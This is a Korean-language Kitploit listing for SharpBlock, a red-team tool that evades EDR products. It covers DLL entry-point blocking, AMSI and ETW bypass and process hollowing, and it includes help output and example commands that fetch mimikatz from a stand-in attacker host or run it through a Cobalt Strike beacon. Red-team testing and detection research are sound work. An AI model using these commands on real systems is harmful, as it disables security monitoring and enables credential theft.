Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/ccob/sharpblock
Red Teaming
GitHubccob/sharpblock

SharpBlock

EDR의 활성 프로젝션 DLL의 진입점 실행을 차단하여 우회하는 방법

저장소 보기
1.2k1655년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

SharpBlock

EDR의 활성 프로젝션 DLL이 진입점 실행을 차단하는 것을 우회하는 방법입니다.

기능

  • EDR DLL의 진입점 실행을 차단하여 EDR 후크가 배치되는 것을 방지합니다.
  • 런타임 시 Amsi.dll 코드 패치를 찾는 스캐너가 감지할 수 없는 패치리스 AMSI 우회를 제공합니다.
  • 호스트 프로세스를 디스크, HTTP 또는 명명된 파이프(Cobalt Strike)에서 로드할 수 있는 임플란트 PE로 대체합니다.
  • 임플란트된 프로세스는 숨겨져서 속이 빈 프로세스를 찾는 탐지를 우회하는 데 도움이 됩니다.
  • 명령줄 인수는 스푸핑되고 프로세스 생성 후 은밀한 EDR 탐지 방법을 사용하여 임플란트됩니다.
  • 패치리스 ETW 우회를 제공합니다.
  • 호출자가 차단된 DLL 주소 공간 범위 내에 있을 때 NtProtectVirtualMemory 호출을 차단합니다.
root@kitploit:~
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

예제

호스트 프로세스로 notepad를 사용하여 SylantStrike의 DLL을 차단하며 HTTP를 통해 mimikatz 실행

root@kitploit:~
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

호스트 프로세스로 notepad를 사용하여 SylantStrike의 DLL을 차단하며 명명된 파이프를 통해 Cobalt Strike 비콘으로 mimikatz 실행

root@kitploit:~
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

참고: upload_file 비콘 명령을 사용하려면 Cobalt Strike의 스크립트 관리자에 upload.cna를 로드하세요.

함께 제공되는 블로그 게시글:

  • https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/
  • https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/
  • https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/
도구 다운로드